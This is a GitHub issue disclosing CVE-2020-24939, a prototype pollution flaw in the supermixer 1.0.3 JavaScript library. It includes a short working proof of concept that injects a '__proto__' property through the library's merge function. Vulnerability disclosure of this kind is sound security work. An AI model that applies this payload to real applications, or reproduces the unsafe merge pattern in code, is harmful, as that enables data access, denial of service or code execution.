Headline
CVE-2020-24939: Prototype pollution · Issue #9 · stampit-org/supermixer
Prototype pollution in Stampit supermixer 1.0.3 allows an attacker to modify the prototype of a base object which can vary in severity depending on the implementation.
I would like to report a Prototype pollution in supermixer, It allows an attacker to modify the prototype of a base object which can vary in severity depending on the implementation.
Vulnerability Description:
Prototype Pollution is a vulnerability affecting JavaScript, Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects.
Proof of Concept:
var mixer = require(‘supermixer’); var payload = '{"__proto__":{"poc":"evil"}}’; var test = {}; console.log("Before: ", test.poc); mixer.merge({},JSON.parse(payload)); console.log("After: ", test.poc);
Impact :
DoS, Access to restricted data, RCE (depends on implementation)